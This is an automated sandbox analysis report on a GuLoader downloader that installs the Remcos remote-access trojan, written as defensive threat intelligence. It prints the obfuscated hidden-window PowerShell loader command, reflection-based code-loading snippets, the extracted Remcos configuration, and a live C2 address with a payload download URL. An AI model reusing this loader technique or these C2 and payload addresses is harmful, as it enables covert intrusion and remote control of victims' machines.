Windows Analysis Report
Q20240425 MAX5073626.com.exe

Overview

General Information

Sample name: Q20240425 MAX5073626.com.exe
Analysis ID: 1431846
MD5: 1c089552c29f12843d8cd8e2bbf5cf5b
SHA1: 6f3e611fc7d7d5938b99575bcd96366d6e213eab
SHA256: 76dbfa281b158a18c83d08a907f087b7330da28bdd2298eb9ee2f23c1df40491
Tags: exe

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "193.239.86.203:3702:1193.239.86.203:4089:1193.239.86.203:4093:1193.239.86.203:2700:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UI3GST", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe Virustotal: Detection: 20%
Source: Q20240425 MAX5073626.com.exe ReversingLabs: Detection: 13%
Source: Q20240425 MAX5073626.com.exe Virustotal: Detection: 21%
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR
Source: Q20240425 MAX5073626.com.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Q20240425 MAX5073626.com.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00402B75 FindFirstFileW, 0_2_00402B75
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040673F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004065F5 FindFirstFileW,FindClose, 0_2_004065F5
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Malware configuration extractor URLs: 193.239.86.203
Source: global traffic TCP traffic: 193.239.86.203 ports 4089,4093,0,2700,8,80,3702
Source: global traffic TCP traffic: 192.168.2.4:49738 -> 193.239.86.203:4089
Source: Joe Sandbox View ASN Name: MERITAPL MERITAPL
Source: global traffic HTTP traffic detected: GET /XWJPh99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 193.239.86.203Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203 (this entry is repeated 50 times in the report)
Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2924069038.0000000007000000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://193.239.86.203/XWJPh99.bin
Source: wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.239.86.203/XWJPh99.binW
Source: Q20240425 MAX5073626.com.exe, Q20240425 MAX5073626.com.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00404B65 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404B65

E-Banking Fraud

Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_0583D53D Sleep,NtProtectVirtualMemory, 7_2_0583D53D
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00407146 0_2_00407146
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00404453 0_2_00404453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0462F000 1_2_0462F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0462F8D0 1_2_0462F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0462ECB8 1_2_0462ECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_074EBB58 1_2_074EBB58
Source: Q20240425 MAX5073626.com.exe Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: Q20240425 MAX5073626.com.exe.1.dr Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: Q20240425 MAX5073626.com.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/11@0/1
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004040BA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow, 0_2_004040BA
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_0040234F CoCreateInstance, 0_2_0040234F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File created: C:\Users\user\AppData\Local\Radioactinium
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-UI3GST
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File created: C:\Users\user\AppData\Local\Temp\nstD63D.tmp
Source: Q20240425 MAX5073626.com.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Q20240425 MAX5073626.com.exe ReversingLabs: Detection: 13%
Source: Q20240425 MAX5073626.com.exe Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File read: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
Source: unknown Process created: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Q20240425 MAX5073626.com.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Frakkelommes $Recirkuleringers $Noting), (Discoloring @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Brainard = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fusel)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bidragsberettigedes, $false).DefineType($Overdriven
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D43895 push cs; ret 1_2_08D438C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4E0B6 push esp; ret 1_2_08D4E0B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4D861 push 34977B93h; iretd 1_2_08D4D89C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4CC01 push cs; ret 1_2_08D4CC10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4B9DD push esi; ret 1_2_08D4B9DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AD72 push cs; ret 1_2_08D4AD88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D45A98 push ebx; retf 1_2_08D45AA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AAA0 push ecx; retf 1_2_08D4AACB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D45252 push ebx; iretd 1_2_08D45253
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AA79 push cs; ret 1_2_08D4AA7C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4DE0B pushad ; ret 1_2_08D4DE19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AE3D push cs; ret 1_2_08D4AE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4576E push es; retf 1_2_08D45774
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D45306 push es; retf 1_2_08D45308
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6B9DD push esi; ret 7_2_03E6B9DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6576E push es; retf 7_2_03E65774
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AD72 push cs; ret 7_2_03E6AD88
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E65306 push es; retf 7_2_03E65308
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AAA0 push ecx; retf 7_2_03E6AACB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6E0B6 push esp; ret 7_2_03E6E0B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E63895 push cs; ret 7_2_03E638C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E65A98 push ebx; retf 7_2_03E65AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6D861 push 34977B93h; iretd 7_2_03E6D89C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AA79 push cs; ret 7_2_03E6AA7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E65252 push ebx; iretd 7_2_03E65253
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AE3D push cs; ret 7_2_03E6AE40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6CC01 push cs; ret 7_2_03E6CC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6DE0B pushad ; ret 7_2_03E6DE19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe
